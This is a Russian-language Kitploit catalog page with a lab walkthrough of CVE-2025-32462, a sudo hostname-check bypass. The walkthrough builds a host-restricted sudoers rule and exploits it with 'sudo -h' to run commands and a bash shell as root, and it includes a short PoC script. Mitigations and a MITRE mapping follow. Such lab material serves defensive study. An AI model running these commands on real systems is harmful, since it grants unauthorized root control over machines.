Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-32462- — CVE-2025-32462 is a local privilege escalation vulnerability in sudo | Kitploit
Инструменты/GitHubGitHub/offsecplaybook/cve-2025-32462-
Privilege EscalationVulnerability AnalysisExploitationPenetration TestingLearning & EducationLabs & Practice
GitHuboffsecplaybook/cve-2025-32462-

CVE-2025-32462-

CVE-2025-32462 is a local privilege escalation vulnerability in sudo

Репозиторий
7 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-32462 – Обход проверки имени хоста sudo для повышения привилегий

CVE Cyber Security Penetration Testing Security Research

Содержание

  1. Обзор
  2. Детали уязвимости
  3. Воздействие
  4. Лабораторная среда
  5. Проверка уязвимой версии
  6. Конфигурация пользователя и sudoers
  7. Пошаговая эксплуатация
  8. Итоги Proof of Concept
  9. Почему Ubuntu не уязвима
  10. Меры по смягчению
  11. Соответствие MITRE ATT&CK
  12. Ссылки
  13. Отказ от ответственности

Обзор

CVE-2025-32462 – это локальная уязвимость повышения привилегий в sudo, которая позволяет непривилегированному пользователю выполнять команды от root путем злоупотребления правилами sudo, ограниченными по имени хоста. Проблема заключается в том, как sudo исторически обрабатывал опцию -h (хост) при проверке авторизации.

Когда правило sudoers ограничено конкретным именем хоста, sudo должно разрешать выполнение только при совпадении системного имени хоста с правилом. Из-за ошибочной логики уязвимые версии доверяли указанному пользователем имени хоста через sudo -h, что позволяло атакующим полностью обойти ограничение.


Детали уязвимости

  • CVE ID: CVE-2025-32462
  • Тип: Локальное повышение привилегий
  • Затронутый компонент: sudo
  • Вектор атаки: Локальный
  • Необходимые привилегии: Низкие (пользователь без sudo)
  • Взаимодействие с пользователем: Не требуется

Корневая причина

sudo позволял аргументу -h <имя_хоста> влиять на решения об авторизации. В уязвимых версиях указанное имя хоста считалось доверенным при оценке правил sudoers, вместо строгой проверки на соответствие реальному имени хоста системы.

В результате ограничения sudo на основе имени хоста могли быть обойдены.


Воздействие

При успешной эксплуатации локальный атакующий может:

  • Выполнять произвольные команды от root
  • Полностью скомпрометировать систему
  • Обойти административные границы безопасности

В реальных средах эта уязвимость особенно опасна в:

  • Многопользовательских системах
  • Защищённых средах, использующих правила sudo, привязанные к хосту
  • Бастионных или прыжковых хостах

Лабораторная среда

КомпонентДетали
ОСDebian 11 (Bullseye – без патча)
Версия sudo≤ 1.9.13
Уровень доступаЛокальный пользователь
ВиртуализацияVirtualBox

⚠️ Примечание: Современные версии Ubuntu и Debian содержат обратно портированные исправления при сохранении похожих строк версий. Данная уязвимость не может быть воспроизведена на исправленных системах.


Шаг 1 – Проверка уязвимой версии sudo

root@kitploit:~
sudo --version

Ожидаемый вывод (уязвимая версия):

root@kitploit:~
Sudo version 1.9.5p2

Шаг 2 – Создание непривилегированного пользователя

root@kitploit:~
sudo useradd -m attacker
sudo passwd attacker
groups attacker

Ожидаемый вывод:

root@kitploit:~
attacker : attacker

Пользователь не должен принадлежать к группе sudo.


Шаг 3 – Настройка уязвимого правила sudoers

Отредактируйте sudoers безопасным способом:

root@kitploit:~
sudo visudo

Добавьте следующую строку:

root@kitploit:~
attacker prod-server = (root) ALL
  • prod-server – ложное имя хоста
  • Реальное имя хоста системы должно отличаться

Проверьте:

root@kitploit:~
sudo -l -U attacker

Ожидаемый вывод:

root@kitploit:~
User attacker may run the following commands on prod-server:
    (root) ALL

Шаг 4 – Подтверждение, что обычный sudo запрещён

Переключитесь на пользователя:

root@kitploit:~
su - attacker

Попробуйте выполнить sudo обычным способом:

root@kitploit:~
sudo id

Ожидаемый вывод:

root@kitploit:~
attacker is not allowed to run sudo on <hostname>

Шаг 5 – Эксплуатация (CVE-2025-32462)

Запустите уязвимость:

root@kitploit:~
sudo -h prod-server id

Вывод при успешной эксплуатации:

root@kitploit:~
uid=0(root) gid=0(root) groups=0(root)

Запустите оболочку root:

root@kitploit:~
sudo -h prod-server /bin/bash

Проверьте:

root@kitploit:~
id

Итоги Proof of Concept

Автоматизированный PoC-скрипт (опционально)

root@kitploit:~
#!/bin/bash
echo "[*] Attempting CVE-2025-32462 exploitation"
sudo -h prod-server id

Сохраните как exploit.sh, сделайте исполняемым и запустите от пользователя attacker:

root@kitploit:~
chmod +x exploit.sh
./exploit.sh
ДействиеРезультат
Обычный sudo❌ Отказ
sudo -h prod-server id✅ Root

Это подтверждает успешное повышение привилегий.


Почему Ubuntu не уязвима

Современные версии Ubuntu поставляются с версиями sudo, попадающими в уязвимый диапазон. Однако Ubuntu обратно портировала исправление безопасности для CVE-2025-32462 без изменения номера версии из апстрима.

В результате:

  • Опция sudo -h больше не влияет на проверки авторизации
  • Подмена имени хоста корректно отклоняется
  • Уязвимость не воспроизводится, несмотря на похожие номера версий

Это подчёркивает важность проверки статуса уязвимости с помощью поведенческого тестирования, а не только по строкам версий.


Меры по смягчению

  • Обновите sudo до исправленной версии
  • По возможности удалите правила sudo, ограниченные по имени хоста
  • Отслеживайте попытки локального повышения привилегий

Соответствие MITRE ATT&CK

  • TA0004 – Повышение привилегий
  • T1548.003 – Злоупотребление механизмом управления повышением привилегий (sudo)

Ссылки

  • Уведомление CVE-2025-32462
  • Объявления безопасности проекта sudo
  • Трекер безопасности Debian

Отказ от ответственности

Данное руководство предназначено только для образовательных целей и защитных исследований безопасности. Не тестируйте эту уязвимость на системах, которыми вы не владеете или на которые не имеете явного разрешения.

Скачать инструмент